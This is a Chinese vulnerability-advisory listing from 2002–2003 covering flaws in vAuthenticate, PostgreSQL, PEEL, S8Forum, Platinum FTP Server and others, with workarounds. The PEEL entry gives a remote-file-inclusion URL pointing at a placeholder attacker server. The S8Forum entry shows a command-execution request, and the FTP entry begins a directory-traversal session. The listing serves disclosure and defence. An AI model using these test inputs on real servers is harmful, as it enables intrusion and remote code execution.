Category: 最新漏洞公告

vAuthenticate远程SQL注入漏洞

发布日期：2003-01-14

更新日期：2003-01-21

受影响系统：

BeanBug vAuthenticate 2.8

描述：BUGTRAQ ID: 6605

vAuthenticate是一款使用PHP和MySQL编写的提供验证保护的脚本，可对web服务提供保护。

vAuthenticate对用户提交给SQL查询的输入缺少充分过滤，远程攻击者可以利用这个漏洞提交恶意SQL命令，更改SQL逻辑，未授权访问保护的WEB页面。

vAuthenticate包含的多个脚本存在SQL注入攻击，问题是对攻击者提交的输入缺少正确检查，导致可利用这个漏洞未授权访问受保护WEB页面。通过访问受保护页面获得敏感信息可帮助攻击者进一步对系统进行攻击。

建议：临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* phpsecure提供如下第三方补丁：

http://phpsecure.rootzmail.net/vAuthenticate2.8.zip

厂商补丁：

BeanBug

——-

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.beanbug.net/Scripts/

PostgreSQL SET TIME ZONE环境变量缓冲区溢出漏洞

发布日期：2003-01-15

更新日期：2003-01-21

受影响系统：

PostgreSQL PostgreSQL 7.2

PostgreSQL PostgreSQL 7.1.3

PostgreSQL PostgreSQL 7.1.2

PostgreSQL PostgreSQL 7.1.1

PostgreSQL PostgreSQL 7.1

PostgreSQL PostgreSQL 7.0.3

PostgreSQL PostgreSQL 7.0.2

PostgreSQL PostgreSQL 7.0.1

PostgreSQL PostgreSQL 7.0

PostgreSQL PostgreSQL 6.5.3

PostgreSQL PostgreSQL 6.3.2

PostgreSQL PostgreSQL 7.2.1

- Conectiva Linux 8.0

…

PostgreSQL TZ环境变量缓冲区溢出漏洞

发布日期：2003-01-15

更新日期：2003-01-21

受影响系统：

PostgreSQL PostgreSQL 7.2

PostgreSQL PostgreSQL 7.1.3

PostgreSQL PostgreSQL 7.1.2

PostgreSQL PostgreSQL 7.1.1

PostgreSQL PostgreSQL 7.1

PostgreSQL PostgreSQL 7.0.3

PostgreSQL PostgreSQL 7.0.2

PostgreSQL PostgreSQL 7.0.1

PostgreSQL PostgreSQL 7.0

PostgreSQL PostgreSQL 6.5.3

PostgreSQL PostgreSQL 6.3.2

PostgreSQL PostgreSQL 7.2.1

- Conectiva Linux 8.0

…

PHP 4.0.3 IMAP模块远程缓冲区溢出漏洞

发布日期：2003-01-08

更新日期：2003-01-14

受影响系统：

PHP PHP 4.0.3

- Debian Linux 2.2 arm

- Debian Linux 2.2 powerpc

- Debian Linux 2.2 68k

- Debian Linux 2.2 i386

…

EType EServ SMTP远程拒绝服务攻击漏洞

发布日期：2003-01-04

更新日期：2003-01-09

受影响系统：

Etype Eserv 2.96

Etype Eserv 2.95

Etype Eserv 2.94

Etype Eserv 2.93

Etype Eserv 2.92

Etype Eserv 2.97

- Microsoft Windows XP Professional

- Microsoft Windows XP Home

- …

Xpdf/CUPS pdftops整型溢出漏洞

发布日期：2002-12-23

更新日期：2002-12-31

受影响系统：

Easy Software Products CUPS 1.1.7

Easy Software Products CUPS 1.1.6

Easy Software Products CUPS 1.1.4-5

Easy Software Products CUPS 1.1.4-3

Easy Software Products CUPS 1.1.4-2

Easy Software Products CUPS 1.1.4

Easy Software Products CUPS 1.1.14

Easy Software Products CUPS 1.1.13

Easy Software Products CUPS …

PEEL远程文件包含漏洞

发布日期：2002-12-31

更新日期：2003-01-07

受影响系统：

PEEL PEEL 1.0b

描述：BUGTRAQ ID: 6496

PEEL是一款PHP编写的目录管理工具。

haut.php脚本对用户提交的参数缺少正确检查，远程攻击者可以利用这个漏洞指定远程服务器上任意文件为包含文件，以WEB权限执行包含文件中的代码。

modeles/haut.php没有正确处理$dirroot参数的内容，远程攻击者可以在自己控制的服务器上构建任意PHP文件，提交包含远程服务器文件的参数数据的请求，可导致包含文件的代码以WEB权限在系统上执行。

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Frog Man （leseulfrog@hotmail.com）提供了如下测试方法：

http://[target]/modeles/haut.php?dirroot=http://[attacker]%26amp;SESSION=.

远程服务器上需要提供包含任意代码的如下文件：

http://[attacker]/lang/lang.php

建议：临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 使用如下代码：

更替%26#39;modeles/haut.php%26#39;中的如下脚本：

厂商补丁：

PEEL

—-

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.mapetite-entreprise.com/

Stunnel不确定SIGCHLD信号处理漏洞

发布日期：2003-01-13

更新日期：2003-01-20

受影响系统：

Stunnel Stunnel 4.03

Stunnel Stunnel 4.02

Stunnel Stunnel 4.01

Stunnel Stunnel 4.0

Stunnel Stunnel 3.22

Stunnel Stunnel 3.21

Stunnel Stunnel 3.18

Stunnel Stunnel 3.19

- RedHat Linux 7.2 ia64

- RedHat Linux 7.2 x86

不受影响系统：

Stunnel …

Platinum FTP Server远程信息泄露漏洞

发布日期：2002-12-30

更新日期：2003-01-06

受影响系统：

Byte/400 PlatinumFTPserver 1.0.6

描述：BUGTRAQ ID: 6492

Platinum FTP Server是一款方便容易管理的FTP服务程序，可使用在各种Windows系统上。

Platinum FTP服务程序不正确处理部分FTP命令，远程攻击者可以利用这个漏洞发送恶意请求，获得FTP服务器上的敏感信息。

任何拥有合法用户帐户的攻击者或者Platinum FTP Server允许匿名访问的情况下，可以使用dir命令，并利用目录遍历漏洞(没有正确处理%26#39;../%26#39;符号)，绕过FTP ROOT限制，访问系统上任意文件信息，通过这些信息可以进一步对系统进行攻击。

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Dennis Rand （DER@cowi.dk）提供了如下测试方法：

C:\>ftp 192.168.1.199

Connected to 192.168.1.199.

220-PlatinumFTPserver V1.0.6

220-PlatinumFTPserver (C)2002 BYTE/400 LTD

220-

220 Enter login details

User …

S8Forum远程可执行任意命令漏洞

发布日期：2003-01-06

更新日期：2003-01-10

受影响系统：

S8Forum S8Forum 3.0

描述：S8Forum是一款由PHP编写的基于WEB的论坛程序。

S8Forum不充分检查用户提交的用户名，EMAIL等字段数据，远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意指令。

S8Forum不使用数据库，而以注册用户为文件名建立文件，并存储在用户目录中。程序没有对用户提交的用户名，EMAIL等字段数据进行充分检查，在这些字段提供恶意PHP代码，可以使远程攻击者直接访问文件以WEB权限在系统上执行任意指令。

测试方法：

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Pine Digital Security Advisory 提供了如下测试方法：

1、访问注册页面。

2、在用户名字段插入:

any_name.php

3、在密码字段插入：

any_pasword

4、在EMAIL字段输入：

然后提交如下访问：

http://sitename/s8forumfolder/users/any_name.php?cmd=uname%20-a

建议：临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 编辑register.php脚本：

在如下一行下面：

case %26#39;registration_confirm%26#39;:

增加下面的代码：

if(!eregi(”^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$”, $email) %26amp;%26amp; $email !=

“”) {

echo “

Please …